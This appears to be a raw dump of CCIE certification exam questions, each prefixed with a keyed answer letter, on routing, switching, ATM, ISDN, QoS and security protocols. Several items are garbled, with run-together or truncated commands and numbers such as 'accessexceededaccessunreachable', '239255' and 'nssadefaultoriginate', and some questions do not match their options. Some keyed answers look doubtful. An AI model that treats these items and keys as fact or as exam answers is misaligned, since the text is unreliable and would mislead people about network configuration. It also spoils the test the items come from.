B #CCIE Q1 Load sharing of VLAN traffic over parallel ISL trunks is:^A. Not possible due to the nature of ISL.^B. Configurable on a per VLAN basis.^C. Configurable on a per packet basis.^D. Automatic due to the nature of ISL and its interaction with the IEEE Spanning Tree protocol. D #CCIE Q2 What does the EIGRP Feasibility Condition mean?^A. The FD must be unique.^B. The FD must be higher than zero.^C. The FD must be equal to RD.^D. The RD must be lower than FD.^E. None of the above. A #CCIE Q3 A network administrator is running OSPF demand circuit across an ISDN link. What statement is correct?^A. The calling router must be network type point-to-point.^B. OSPF demand circuit requires network type non-broadcast.^C. OSPF demand circuit will not trigger the link if an OSPF interface goes down.^D. OSPF demand circuit will bring up the link if the topology of the network changes. C #CCIE Q4 In a PIMv2 Sparse Mode network, the “incoming interface” for a (*, G) mroute entry is calculated using:^A. The address of the source.^B. The address of the PIM neighbor that sent the PIM (*, G) Join message.^C. The address of a directly connected member of group “G”.^D. The address of the currently active Rendezvous Point for group “G”.^E. The address of the Mapping Agent. A #CCIE Q6 Assume a Catalyst 6500 with a Supervisor IA with a MSFC. The MSFC has lost its boot image and the device is now in Rommon.^ What method will work to load c6msfcbin?^A. Xmodem^B. FTP^C. TFTP^D. SNMP A #CCIE Q8 What statement is FALSE with respect to the operation of Unidirectional Link Detection?^A. It negotiates the Unidirectional Link Detection link state during physical signaling.^B. It performs tasks that autonegotiation cannot perform.^C. It works by exchanging protocol packets between the neighboring devices.^D. Both devices on the link must support Unidirectional Link Detection and have it enabled on respective ports. 
B #CCIE Q10 What is true concerning Traffic contract, Traffic shaping, and Traffic policing in ATM networks?^A. They are parameters of PNNI set during PNNI configuration.^B. They are forms of QoS features used in ATM networks.^C. They are types of SVCs.^D. They are types of PVCs.^E. They are only used between ATM switches to control traffic flows. E #CCIE Q12 Which are the primary reasons to use traffic shaping?^A. To control the maximum rate of traffic transmitted or received on an interface.^B. To control access to available bandwidth.^C. To define Layer 3 aggregate or granular incoming or outgoing bandwidth rate limits.^D. To control the average queue size by indicating to the end hosts when they should temporarily slow down transmission of packets.^E. To ensure that traffic conforms to the policies established for it. D #CCIE Q13 In a bridged network running IEEE 802.1d spanning tree, what parameter will a bridge take from the root bridge?^A. Maxage^B. Forwarding delay^C. Hello time^D. All of the above B #CCIE Q14 What statement is FALSE concerning the use of SPAN on the Catalyst 6500?^A. It is possible to configure SPAN to have a Gigabit port, such as source port, and a 10/100 port as the destination port.^B. If the source port is configured as a trunk port, the traffic on the destination port will be tagged as well, regardless of the configuration on the destination port.^C. When a SPAN session is active the destination port does not participate in Spanning Tree.^D. With SPAN an entire VLAN can be configured to be the source.^E. In one SPAN session it is possible to monitor multiple ports that do not belong to the same VLAN. A #CCIE Q16 What command switches a SONET APS protected circuit over the back-up circuit?^A. aps force atm circuit-.number^B. aps manual circuit-number^C. redundancy force-failover^D. aps backnumber^E. aps force circuit-number E #CCIE Q17 What is NOT a BGP attribute?^A. Origin^B. Weight^C. Local_pref^D. Community^E. 
Cluster_list A #CCIE Q18 According to the IEEE 802.11b Wireless LAN specification, what sub-field is NOT part of the Frame Control Field?^A. Duration^B. Power Management^C. Wired Equivalent Privacy^D. More Fragments^E. Order B #CCIE Q19 A switch has been configured to support MultiLayer Switching (MLS). ^ In addition, Access Control Lists on the MLS-Route Processor have been configured to block all FTP traffic destined to the Internet.^ What flow mask will be used to create each shortcut?^A. Application flow mask.^B. Full flow mask.^C. Destination^D. Destination flow mask. E #CCIE Q21 What feature is provided by IOS NAT (Network Address Translation)?^A. Dynamic network address translation using a pool of IP addresses, or port address translation using a single IP address.^B. Destination based address translation using either route map or extended access-list.^C. Dynamic translation for DNS “A” and “PTR” queries.^D. Inside and outside source static network translation that allows overlapping network address spaces on the inside and the outside.^E. All of the above. A,B #CCIE Q22 Which statements about FTP are true?^A. FTP always uses two separate TCP sessions – one for control and one for data.^B. With passive mode FTP, both the control and data TCP sessions are initiated from the client.^C. With active mode FTP, the server used the “PORT” command to tell the client on which port it wished to send the data.^D. For both active and passive mode FTP, the control session on the server always uses TCP port 21, and the data session always uses TCP port 20. B #CCIE Q23 A network administrator wants an IP static route to point to a backup link, but only if the same route is not available via a dynamic routing protocol.^ How would this be accomplished?^A. Create a static route with a lower administrative distance than the dynamic protocol.^B. Create a static route with a higher administrative distance than the dynamic protocol.^C. 
Create a static route with a lower metric than the dynamic protocol.^D. Create a static route with the floating-static keyword. C #CCIE Q24 In Token Ring networks, Layer 3 IP Multicast addresses are mapped into Layer 2 Token Ring MAC addresses in which ways?^A. All IP Multicast addresses are mapped to broadcast MAC address FFFF.FFFF.FFFF.^B. All IP Multicast addresses are mapped to Functional Address C000.0000.0001.^C. All IP Multicast addresses are mapped to Functional Address C000.0004.0000.^D. All IP Multicast addresses are mapped to MAC addresses using the same method as is used in Ethernet networks.^E. Configure the Ring Parameter server to set the I/G address to 1. A #CCIE Q25 Consider the length of the netmask of a route, the administrative distance and the metric, what comes first when the router performs a route lookup in order to decide which interface to forward a packet out of?^A. The length of the netmask of a route.^B. The administrative distance.^C. The metric.^D. None of the above. A #CCIE Q28 What trunk mode combination would not produce an operational ISL trunk?^A. Local: auto Remote: auto^B. Local: on Remote: auto^C. Local: nonegotiate Remote: nonegotiate^D. Local: nonegotiate Remote: on^E. Local: auto Remote: desirable B #CCIE Q30 A network administrator wants to advertise the network 135.30.0/27 to an EBGP peer. ^ What command would be used to accomplish this?^A. network 135.30.45.0 255.255.0.0^B. network 135.30.45.0 mask 255.255.255.224^C. network 135.30.45.0^D. network 135.45.0.0 C #CCIE Q32 What is the maximum one-way latency allowed by the ITU that is acceptable for the majority of voice applications?^A. 15 milliseconds^B. 30 milliseconds^C. 150 milliseconds^D. 300 milliseconds^E. 1.5 seconds B #CCIE Q33 For ATM switched Virtual Circuits to work correctly, what is required?^A. ARP server.^B. Signalling and ILMI PVC’s.^C. QoS type set to CBR+.^D. All of the above. C #CCIE Q34 MPLS traffic engineering routing information is carried by:^A. 
BGP MEDs^B. MP-BGP^C. OSPF Opaque LSAs or IS-IS TLVs^D. RTP or RTCP packets A #CCIE Q35 What type of EIGRP packets carry the Init flag embedded?^A. Hello^B. Update^C. Query^D. Reply^E. Ack A #CCIE Q36 An AT&T 5ESS NI1 switch uses what terminal type of ISDN?^A. Terminal type A.^B. Terminal type B.^C. Terminal type C.^D. Terminal type D.^E. All of the above. A,C,E #CCIE Q38 Which are common problems that cause clocking problems on a serial line?^A. Several cables connected together in a row.^B. Too much –db gain on the serial line.^C. Incorrect CSU configuration.^D. Impedance mismatch.^E. Incorrect DSU configuration. B #CCIE Q39 There is a point-to-point ISDN link between Routers A and B. Router A must be able to dial Router B, but Router B must NOT be able to dial Router A. What will accomplish this?^A. Use an IP accessgroup command on the interface.^B. Remove the dial string from Router B.^C. Use the no-dial keyword on the interface.^D. Use the same IP address on both sides of the link. C #CCIE Q41 Considering OSPF where a binding between an interface and an area has been done, what is the effect of defining such an interface as passive?^A. OSPF will not form any adjacency out of that interface but it will accept the routing updates from the neighbors.^B. OSPF will form all the available adjacencies out of that interface but it won't install any of the learned routes in the local routing table.^C. OSPF will not form any adjacency out of that interface.^D. OSPF will behave as a passive adjacency at the requests coming from neighbors, lying out of the interface, ignoring all the incoming requests.^E. None of the above. C #CCIE Q42 With respect to the ATM Reference Model what is NOT one of the ATM layers?^A. Physical layer.^B. ATM adaptation layer (AAL).^C. Generic Flow Control (GFC) layer.^D. ATM layer. A #CCIE Q44 What statement is TRUE regarding VLAN Trunk Protocol (VTP) pruning?^A. VTP pruning only affects traffic from VLANs that are pruning eligible.^B. 
VLAN 1 is always pruning eligible.^C. Pruning eligibility is determined by the amount of ports assigned to a VLAN.^D. VTP pruning is a way to detect the removal of a VLAN within a VTP domain. C #CCIE Q45 Routers A, B, and C are running IGRP over frame relay connections. ^ No subinterfaces are used, and a single IP subnet is used for all the Frame Relay interfaces. ^ Router A is able to see routes from both Router B and Router C, but Router B and Router C cannot see routes from each other.^ Which could be causing this problem?^A. Router A is missing frame maps.^B. Router B and Router C are missing frame maps.^C. Split-horizon is enabled on Router A.^D. Split-horizon is disabled on Router A. A #CCIE Q46 What is the goal of the ISIS CSNP and the PSNP packets?^A. PSNP are used either to acknowledge the receipt or to request the retransmission of the latest version of an LSP while the CSNP are used for synchronizing the LS Database of adjacent neighbors.^B. CSNP are used either to acknowledge the receipt or to request the retransmission of the latest version of an LSP while the PSNP are used for synchronizing the LS Database of adjacent neighbors.^C. PSNP are used to acknowledge the receipt of the latest version of an LSP while the CSNP are used either for synchronizing the LS Database of adjacent neighbors or to request the retransmission of an LSP.^D. CSNP are used to acknowledge the receipt of the latest version of an LSP while the PSNP are used either for synchronizing the LS Database of adjacent neighbors or to request the retransmission of an LSP. B,C #CCIE Q47 Suppose a network access server (NAS) is configured to use TACACS+ to provide user authentication service for remote access users. ^ The NAS gets an ERROR in response to its authentication request when:^A. The TACACS+ service is not running on the server.^B. The supplied user password is incorrect.^C. The username does not exist in the TACACS+ user database.^D. 
The NAS TACACS+ server key does not match that on the server.^E. The TACACS+ server is unreachable by the NAS. B,D #CCIE Q48 Routers 1, 2, 3, and 4 are all connected to a hub via Ethernet interfaces. ^ All routers have a basic OSPF configuration of a network statement for the Ethernet network.^ show ip ospf neighbor on Router 2 shows 2WAY/DROTHER for its neighbor, Router 3.^ Which conclusions can we draw from this?^A. R2 is the DR or BDR.^B. R3 is not a DR or BDR.^C. R2 – R3 adjacency is not FULL yet as the only possible conclusion.^D. R2 is not the DR.^E. R4 is the DR. D #CCIE Q49 A new Catalyst switch is in a lab. ^ It is decided that a download of the latest supervisor image is needed, so the switch is connected to the corporate Catalyst switch in the lab through the supervisor gigabit ports that are both in VLAN 100 with a single fiber pair. ^ VLAN 100 only existed on the two supervisor ports used and only one router existed in that VLAN. ^ Shortly thereafter thousands of complaints are received that users cannot connect to anything on the network. ^ What command should have been issued on the lab switch prior to connecting to the corporate switch to prevent this problem?^A. Clear cam dynamic.^B. Set spantree uplinkfast enable 1/1.^C. Set trunk 1/1 desirable isl.^D. Set vtp mode transparent.^E. Set port broadcast 1/1 25% unicast enable. C #CCIE Q50 The configured passwords for a Catalyst 5000 switch have been lost. The switch will use a known password for the first 30 seconds after boot. What is the password?^A. cisco^B. Cisco^C. Enter key^D. Ctrlx^E. SanFran C #CCIE Q51 A company has deployed a new e-commerce web farm. ^ They are using teamed servers that use multicast to maintain a heartbeat between redundant pairs. All servers are in the 192.168.202.0/24 network. ^ For increased security, they require each pair of servers be allowed to see multicast/broadcast traffic from their default gateway and from each other. 
^ No pair of servers should ever see any broadcast/multicast traffic from any other pair of servers. ^ Which is the best mechanism for the server ports to accomplish this?^A. Isolated Ports.^B. Promiscuous Ports.^C. Community Ports.^D. Teamed Ports.^E. Span Ports. B #CCIE Q52 Which EIGRP packets are sent using a reliable mechanism?^A. Hello^B. Update^C. Query^D. Reply^E. Ack A,B,C #CCIE Q53 Which protocols do not need to have their own router ID reachable by other routers to have proper network connectivity?^A. OSPF^B. BGP^C. EIGRP^D. LDP^E. TDP B,C #CCIE Q55 Transparent bridges forward, flood, or drop frames based upon entries in the bridge table which may be dynamically added to or removed from the table. ^ Which statements are TRUE regarding bridge table entries?^A. Bridge table entries are learned by examining the destination MAC address of each frame.^B. Bridge table entries are learned by examining the source MAC address of each frame.^C. Increasing the bridge table aging time would result in a reduction of flooding.^D. Decreasing the bridge table aging time would result in a reduction of flooding.^E. It is important to ensure that the aging time is less than the aggregate time to detect and recalculate the spanning tree. E #CCIE Q56 Which events cause the EIGRP neighbor relationship to be restarted?^A. Issuing the clear ip route command.^B. Receiving an update packet with Init flag set from a known, already established neighbor relationship.^C. Receiving an update packet from an unknown neighbor.^D. Clearing the IP cache.^E. Clearing the IP EIGRP neighbor relationship. D #CCIE Q57 What protocol is NOT part of the Signaling System No. 7?^A. ISUP^B. TCAP^C. MTP^D. SIP^E. SCCP A,C #CCIE Q58 By entering the IOS global configuration command aaa new-model, which authentication protocols will be disabled?^A. TACACS^B. TACACS+^C. Extended TACACS (XTACACS)^D. Radius^E. Kerberos B #CCIE Q59 The IEEE 802.5 standard defines the specifications for token ring networks. 
^ The standard uses a centralized ring maintenance mechanism called active monitor that oversees the ring. ^ What is NOT a responsibility of the active monitor?^A. Checking for lost tokens.^B. Locating breaks in the ring.^C. Removing continuously circulating frames resulting from a failed sending device from the ring.^D. Cleaning up the ring when garbled frames appear.^E. Inserting delay bits to the ring if it is not big enough for the token to circulate. C #CCIE Q60 The LAPD protocol is formally specified in:^A. ITU-T T.30^B. ITU-T T.261^C. ITU-T Q.920^D. ITU31^E. ITU931 C #CCIE Q62 What flag in the TCP header tells the receiver to pass all the data to the receiving application upon arrival?^A. ACK^B. SYN^C. PSH^D. URG^E. RST A #CCIE Q63 Routers A and B are running BGP in the same Autonomous System. ^ Routes from Router B show up in the BGP table of Router A, but not in the routing table of Router A as BGP routes. What might cause this?^A. Synchronization is on but Router A is not receiving the same routes via an internal protocol.^B. Synchronization is off but Router A is not receiving the same routes via an internal protocol.^C. Synchronization is off but the BGP peers are down.^D. Nextself is disabled on Router A. D #CCIE Q64 Like the reserved Private IP address ranges (RFC 1918), there is also a list of Class D reserved Multicast addresses (RFC 1700). ^ Select the correct answer that matches RFC 1700.^A. 224.0.0.0 – 224.255.255.255^B. 225.0.0.0 – 225.255.255.255^C. 232.0.0.0 – 232.255.255.255^D. 239.0.0.0 – 239255^E. All of the above. C #CCIE Q67 Which is the protocol that On-Demand Routing relies on?^A. IP^B. TCP^C. CDP^D. UDP^E. PPP B #CCIE Q68 Traceroute does not work on Host A (a Unix workstation) to the Internet. ^ Currently, there is an inbound accesslist 101 permit tcp any any”. ^ What access-list entry may need to be added in order to get traceroute to work?^A. access-list 101 permit udp any any^B. accessexceededaccessunreachable^C. 
accessexceededaccessunreachable^D. access-list 101 permit icmp any any echoaccessunreachable^E. access-list 101 permit udp any anyaccessunreachable E #CCIE Q71 The BGP backdoor command:^A. Changes the distance of an iBGP route to 20.^B. Changes the distance of an eBGP route to 200.^C. Changes the distance of an IGRP route to 200.^D. Changes the distance of an IGP route to 20.^E. Does not change the distance of the route. D #CCIE Q73 What is not a valid DNS resource record?^A. MX^B. PTR^C. A^D. FQDN^E. NS D #CCIE Q74 router ospf 1^ redistribute igrp 20 metric 50 subnets^ What is the effect of the subnets keyword in the above configuration?^A. It forces IGRP to support VLSM in this context.^B. It causes OSPF to recognize classful networks.^C. It has no effect, IGRP always summarizes on class boundaries anyway.^D. It causes OSPF to accept networks with non-classful masks. B,C,D,E #CCIE Q75 Which four features does RIP version 2 provide, which were impossible with RIP version 1? (Choose four)^A. Poison reverse and classless routing.^B. Classless routing and split-horizon.^C. Poison reverse and updates to multicast address.^D. Classless routing and updates to multicast address.^E. Route tag and classless routing. D #CCIE Q77 What is true about Custom Queuing?^A. Custom queuing will always empty a queue before proceeding to the next queue.^B. Custom queuing can be used to restrict a particular type of traffic to a given bandwidth regardless of the load on that link.^C. Custom queuing looks at groups of packets from the same source-destination pair.^D. Custom queuing can prevent one type of traffic from dominating a busy link. B #CCIE Q78 What ISDN reference point network boundary does not have an ITU-T standard?^A. S/T^B. U^C. R^D. S^E. T A #CCIE Q79 Which statements are true concerning distance vector and link state routing protocols?^A. 
Distance vector protocols have a finite limit of hop counts whereas link state protocols do not have a limit on the number of hops for a route.^B. Distance vector protocols have better convergence than link state protocols.^C. RIP is a distance vector protocol whereas RIP version 2 and OSPF are link state protocols.^D. Distance vector protocols only send updates to neighboring routers whereas link state protocols flood updates to all routers within the same routing domain.^E. Both distance vector and link state protocols will take link bandwidth and delays into account when calculating routes. D #CCIE Q80 What security service is NOT provided by IPSec?^A. Data confidentiality.^B. Data integrity.^C. Data origin authentication.^D. Protection for multicast/broadcast traffic.^E. Anti-replay. E #CCIE Q81 When configuring IPSec on IOS routers, what is a valid ISAKMP policy parameter?^A. SA lifetime.^B. Encryption algorithm.^C. Hash algorithm.^D. Authentication method.^E. All of the above. B #CCIE Q83 Policing on a Fast Ethernet interface has been configured using Committed Access Rate (CAR) to allow for extended burst. ^ Traffic has been bursty and a packet arrives on the interface that causes the compounded debt to be greater than the extended burst. What statement is FALSE?^A. The packet is dropped.^B. A token is removed from the token bucket.^C. The compounded debt value is effectively set to zero (0).^D. The packet is not buffered by the CAR process. B #CCIE Q84 When connecting two different VLAN Trunk Protocol domains together via an ISL trunk, the switches fail to form the trunk automatically. ^ What is the likely cause?^A. The trunks need to be set to “on” or “nonegotiate”.^B. The VTP domain names carried in the Dynamic Inter-Switch Link (DISL) messages are not the same.^C. The Unidirectional Link Detection timers are shorter than the Spanning Tree Protocol (STP) timers.^D. The native VLANs are the same.^E. 
The VLAN Trunk Protocol multicast address was set to 01 C #CCIE Q88 What is the first task required in password recovery on a Catalyst 5000 series switch?^A. Set the configuration register to ignore the startup configuration.^B. Set the boot register to 0x2142.^C. Power cycle the switch.^D. Reload the switch using the reload command. A #CCIE Q89 Exhibit: In the MPLS network shown, how many routing tables are on Router TK1?^A. 1^B. 2^C. 3^D. 4^E. 5 A,B #CCIE Q90 Which statements are FALSE concerning the use of VACLs on the Catalyst 6500 switch? (Choose two)^A. VACLs can be used to forward/drop and redirect traffic based on Layer 2 and Layer 3 information.^B. VACLs cannot be used when using QoS on the switch.^C. VACLs can be used together with RACL’s.^D. VACLs can be used for traffic that is being L3 switched.^E. VACLs do not cause extra latency for traffic passing through the switch. A #CCIE Q92 According to the IEEE 802.5 Token Ring specification, what field is an optional component?^A. RI – Routing Information^B. FC – Frame Control^C. FCS – Frame Check Sequence^D. EFS – End of Frame Sequence^E. AC – Access Control C #CCIE Q94 What is the purpose of the clock source command used in IOS T1/E1 interface command mode, and what is the default setting?^A. Routers are DTEs and NEVER supply clock to T1/E1 line.^B. clock source identifies the stratum level associated with the router T1/E1 and the default is Stratum 1.^C. clock source chooses a source for the interface to clock outbound data. The default is clock source line – Specifies that the T1/E1 link uses the recovered clock from the line.^D. clock source chooses a source for the interface to clock buffered data. The default is clock source loop-timed – Specifies that the T1/E1 interface takes the clock from the Tx(line) and uses it for Rx. A #CCIE Q96 In Frame Relay traffic shaping, the bc and be parameters are expressed as:^A. Bits per second.^B. Bits per interval.^C. Bytes per second.^D. Bytes per interval. 
B #CCIE Q97 What signaling protocol does Cisco use to provide support for MPLS traffic engineering?^A. RSVP^B. LDP^C. SS7^D. TDP B,D,E #CCIE Q98 This inbound ACL is configured on the router:^ access-list 101 permit tcp any host 209.165.201.10 eq telnet^ access-list 101 deny ip any any^ Which types of packets will be permitted through the router?^A. A non-fragment packet going to the server on port 21.^B. A non-initial fragment packet going to the server on port 23.^C. A non-fragment going to another host that’s not 229.165.201.10.^D. A non-initial fragment packet going to the server on port 21.^E. An initial fragment packet going to the server on port 23. B,E #CCIE Q99 Which two are correct framing types for a T1 data line? (Choose two)^A. B8ZS^B. SF^C. EMI^D. AMI^E. ESF E #CCIE Q101 Which are LANE Components that are used to logically establish a LANE network?^A. LECS, redundant LECS, and BUS.^B. SSRP, UNI, NNI and LEC.^C. ILMI, AAL5, LANE and SSCOP.^D. BUS, LES, LEC and VCC.^E. LECS, LES, and BUS. A #CCIE Q106 Using a sniffer, it is verified that a Router is receiving a specific SAP but the server is not showing up in the server table. ^ Which are possible reasons?^A. The Router doesn’t know how to get to the IPX network advertised in the SAP packet.^B. The SAP table already contains a similar entry with a different SAP type.^C. There is an Access-list configured to filter out this SAP type.^D. The router only runs NLSP.^E. The server only runs NLSP. D #CCIE Q108 ISDN TE2 includes:^A. Devices that manage switching functions.^B. Devices that use the standard ISDN interface.^C. The boundary between the carrier’s ISDN network and the CPE.^D. Devices that do not use the standard ISDN interface.^E. None of the above. E #CCIE Q109 To what IP address does RIPv2 send its own routing update packets?^A. 224.0.0.10^B. 255.255.255.255^C. 224.0.0.13^D. 224.0.0.5^E. 224.0.0.9 E #CCIE Q110 How does a router behave in relation to an EIGRP stub neighbor?^A. 
It will send only default-routes toward stub EIGRP neighbors.^B. It will send only summary routes toward stub EIGRP neighbors.^C. It will not query the stub EIGRP neighbor about any internal route.^D. It will not query the stub EIGRP neighbor about any external route.^E. It will not query the stub EIGRP neighbor about any route. E #CCIE Q111 An interface has been configured for custom queuing. Bandwidth has been allocated for three flows A, B and C with average packet sizes of 1000 bytes, 500 bytes and 250 bytes respectively. ^ If flow A has been configured to allow one packet per servicing of its queue, how many packets need to be allowed for flow C in order to achieve a ratio of 20:50:30 for flows A, B and C respectively?^A. 1^B. 2^C. 3^D. 4^E. 5^F. 6 D #CCIE Q112 What effect do these configuration commands have?^ line vty 0 4^ no login^ password cisco^A. The VTY password is cisco.^B. The login password is login^C. The VTY password is required but not set.^D. No password is required for VTY access. A #CCIE Q113 Multicast addresses in the range of 239.0.0.0 through 239.255.255.255 are reserved for:^A. Administratively Scoped multicast traffic that is intended to remain inside of a private network and is never intended to be transmitted into the Internet.^B. Global Internet multicast traffic intended to travel throughout the Internet.^C. Link-local multicast traffic consisting of network control messages that never leave the local subnet.^D. Any valid multicast data stream. D #CCIE Q114 What is the tiebreaker used by ISIS to elect the Designated IS on a LAN in a case where all the neighbors have the same priority?^A. The lowest MAC address.^B. The highest router-ID.^C. The lowest router-ID.^D. The highest SNPA.^E. The lowest system-ID. B,C #CCIE Q115 When using a sniffer directly connected to an access switch, the sniffer sees an excessive amount of BPDUs with the TCA bit set.^ Which are the most likely explanations?^A. There is no problem in the network.^B. 
Ports connecting 2 workstations do not have spanning tree portfast configured.^C. Bad cabling is being used in the network.^D. The CPU utilization on the root switch is getting up to 99% and thus is not sending any BPDUs. C #CCIE Q116 A network administrator is using a private IP address space for the network with NAT to allow the users to reach the Internet. ^ However, there is a web server on the internal network that must have incoming access from the Internet. What will be required to accomplish this?^A. Put the web server’s internal IP address in the external DNS records.^B. Use a dynamic mapping with the reverse keyword.^C. There must be a static NAT mapping for the web server’s address.^D. Dynamic NAT will take care of this automatically. B #CCIE Q118 When doing an IPX ping from a Cisco router to a Novell server there is no response. What is a possible cause?^A. Novell Servers never respond to IPX pings. This only works between Cisco Routers.^B. Cisco IPX Pings are being sent to a Novell Server.^C. There is no IPX network configured on Loopback 0.^D. The IPX server table doesn’t contain the correct SAP entry.^E. All of the above. B #CCIE Q120 What is not a transfer mode supported by HDLC?^A. ARM^B. ARB^C. ABM^D. NRM^E. LAPB D #CCIE Q122 According to the IEEE 802.2 Logical Link Control specification, the maximum transmit value for LLC flow control is:^A. 15^B. 127^C. 255^D. 1023^E. 4095 B #CCIE Q123 The interface command Router (config-if) invert txclock is used for what purpose?^A. It switches TXD and RXD to correct mis-wired cables.^B. It corrects systems that use long cables that experience high error rates when operating at the higher transmission speeds.^C. It configures the serial interface to monitor the DSR signal as the line up/down indicator.^D. It is used to correct situations where it is possible to send back-to-back data packets over serial interfaces faster than some hosts can receive them. 
D #CCIE Q124 It is suspected that packets are being lost on a link between one of your routers and the switch. ^ This connection is configured to be Full Duplex 100Mb Ethernet. To diagnose what is going on on this link, a Fast Ethernet Hub is connected in between the Router and the Switch and an excessive number of alignment errors, CRC errors and Late Collisions are seen.^ What statement is true?^A. Either the Router or the Switch is broken. Looking at sniffer traces, the Source MAC address of the error frames will determine what device it is.^B. These errors are not causing a performance problem.^C. The cabling is bad and thus needs to be replaced.^D. Adding the Hub in between might have caused the errors seen on the link. E #CCIE Q125 ^ Current configuration:^ version 12.0^ service timestamps debug uptime^ service timestamps log update^ no service password-encryption^ hostname Simon^ enable secret 5 $1$XV53$hqb0Ra7gwpky0cmL4u3EW0^ enable password cisco^ Given the configuration shown above, what should you type to gain enable access on router Simon?^A. cisco^B. Simon^C. 4u3EW0^D. $1$XV53$hqb0Ra7gwpky0cmL4u3EW0^E. Cannot tell B #CCIE Q126 What statement is true concerning Multilayer Switching?^A. The first packet in every flow will be forwarded by the MLS Switching Engine.^B. The first packet in every flow will be forwarded by the MLS Route Processor.^C. Every 10th packet in every flow will be redirected to the MLS Route Processor.^D. Every 100th packet in every flow will be forwarded by the MLS Route Processor.^E. All traffic will be forwarded by the MLS Switching Engine. B #CCIE Q128 Which layers in the OSI reference model are missing from the TCP/IP reference model?^A. Network^B. Presentation^C. Transport^D. Session^E. Data link A,C,E #CCIE Q129 A router running OSPF, that is being connected to Area 0 and Area 1, is configured with area 1 nssadefaultoriginate. Which are false?^A. The router will inject a type 3 default route into area 1.^B. 
The router will inject a type 7 default route into area 1.^C. The router will inject a type 5 default route into area 1.^D. The router needs a default route in its routing table to inject a default into area 1.^E. The router does not need a default route in its routing table to inject a default into area 1. E #CCIE Q131 How many LSPs does a non-pseudonode ISIS router originate?^A. 1 per link.^B. 1 per link and 1 per external route.^C. Always a minimum of 3.^D. 1, but 2 if there are external routes redistributed into ISIS on this router.^E. Always 1. C #CCIE Q132 Packets need to be sent, arriving via DLSW+ on Router A to a host on an Ethernet attached to Router A. ^ Bridging is enabled on the Ethernet but packets are not reaching the host. What is most likely the problem?^A. SRTLB should be run between the source route Virtual Ring and the Ethernet.^B. The DLSW+ peer cost doesn’t match the Ethernet bridge group.^C. The DLSW+ bridge-group command is missing.^D. The bridge-group number on the Ethernet is too high. B #CCIE Q133 A company has 2 border routers running BGP to 2 different ISP’s. ^ They want to control which path inbound traffic takes without the use of communities. ^ What is the most important consideration?^A. Metric^B. MED^C. AS-path prepending^D. Weight^E. Local preference B #CCIE Q135 What statement is TRUE regarding Fast Ethernet Channel?^A. Ports within a Fast Ether Channel do not have to be the same speed and duplex.^B. Port Aggregation Protocol (PAGP) facilitates the automatic creation of Fast Ether channels links.^C. Fast Ethernet Channels can not be configured as a trunk.^D. Ports within a Fast Ether Channels can not be configured as a trunk.^E. Ports within a Fast Ether Channel can be assigned to multiple VLANs. A #CCIE Q136 What is NOT true about IRB?^A. IRB allows the same protocol to be bridged and routed through the same physical interface.^B. IRB allows the same protocol to be bridged and routed on the same router.^C. 
IRB uses a virtual interface to connect bridge and routed interfaces.^D. IRB can support multiple protocols on the same router. B #CCIE Q137 When using an LX/LH Gbic, what is the maximum supported cable length when using a Single Mode Fiber with a 8.3/9/19 micron Core?^A. 1504 ft (500 m)^B. 6.2 miles (10 km)^C. 3.1 miles (5 km)^D. 4.6 miles (7.5 km)^E. This type of fiber is not supported with an LX/LH gbic. D #CCIE Q138 A network administrator wants a filter that only allows IPX network numbers between BB100 and BB1FF (inclusive). What access list will accomplish this?^A. access-list 805 permit range BB100 BB1FF^B. access-list 850 permit any BB100.0000.0000.0000 B1FF.FFFF.FFFF.FFFF^C. access-list 920 permit any BB100.0000.0000.0000 FF.FFFF.FFFF.FFFF^D. None of the above. C #CCIE Q139 What command in interface configuration mode would you use to enable RSVP?^A. ip rsvp sender^B. ip rsvp enable^C. ip rsvp bandwidth^D. ip rsvp reservation^E. RSVP is enabled in global configuration mode, not in interface configuration mode. E #CCIE Q140 After adding a new switch to the network it is determined that it is not automatically learning the VLANs via VTP. ^ What is most likely the cause?^A. The other switch is a VTP client.^B. The VTP server has not sent out a periodic VTP advertisement.^C. There are not yet users on the new switch.^D. The native VLAN on the trunk is VLAN 60.^E. The VTP domain name is misconfigured. B #CCIE Q141 The log of 7500 with a FDDI interface is showing this message about twice a day^ :%CBUSBADTXEOFVEC: Fddi0/0 ustatus: bad txEof vec^ It is learned from the TAC that this message is indicative that the interface has aborted the transmit due to a claim frame coming in to the interface while the interface was transmitting. ^ The FDDI ring contains some very important web servers and workstations for upper management.^ What action should be taken?^A. 
The TAC should be contacted and a case should be logged, as this is indicative of a major problem on the FDDI ring.^B. Claim Frames are a normal occurrence, so no action should be taken.^C. A sniffer should be placed on the ring to find the cause of the claims.^D. The FDDI concentrator should be replaced, and all FDDI cables checked.^E. The FDDI Interface should be replaced. A #CCIE Q142 A large number of these messages are seen on a Catalyst console:^ %MLSMOVEOVERFLOW:Too many moves, stop MLS for 5 sec(20000000)^ %MLSRESUMESC:Resume MLS after detecting too many moves^ What is the least likely cause?^A. Transitory Spanning Tree loop^B. Unidirectional Fiber Link^C. Faulty Switch Port^D. Pinnacle Sync Failure D #CCIE Q144 Which statement concerning the difference between TACACS+ and RADIUS is NOT true?^A. TACACS+ uses UDP while RADIUS uses TCP for transport.^B. RADIUS only encrypts the password field of the packet while TACACS+ encrypts the entire body of the packet.^C. RADIUS is an IETF standard, while TACACS+ is not.^D. TACACS+ sends a separate request for authorization, while RADIUS uses the same request for authentication and authorization. A #CCIE Q145 A legacy ISDN configuration connects, but EIGRP is not sending updates across the link. What could be causing this?^A. The dialer-list is blocking EIGRP.^B. The encapsulation is different on both sides of the link.^C. There is a network type mismatch.^D. The broadcast keyword is missing from the dialer-map. A #CCIE Q146 What LSA type does the area range command act on?^A. Type 1 and 2.^B. Type 3 and 5.^C. Type 4.^D. Type 1, 2 and 3.^E. Type 4 and 5. D #CCIE Q148 Which LSAs run inside a stub OSPF area?^A. Type 1.^B. Type 1 and 3.^C. Type 1 and 2.^D. Type 1, 2 and 3.^E. Type 3 and 5. A #CCIE Q149 A port on a FDDI concentrator keeps getting disabled after a few hours and the port has to be manually re-enabled. Which are possible causes?^A. The link quality is bad.^B. Someone keeps disabling this port.^C. 
